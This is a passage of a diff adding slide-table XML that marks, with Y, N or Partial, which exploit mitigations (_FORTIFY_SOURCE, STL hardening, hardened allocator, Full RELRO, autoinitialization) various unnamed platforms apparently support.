+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4019088140"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>_FORTIFY_SOURCE</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (2)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (2)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (2)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (3)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3897187528"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>STL hardening</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3191230236"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Hardened allocator</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="492283927"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Full RELRO</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Partial</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:srgbClr val="FFFF00"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="654146900"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+                        <a:t>Autoinitialization</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
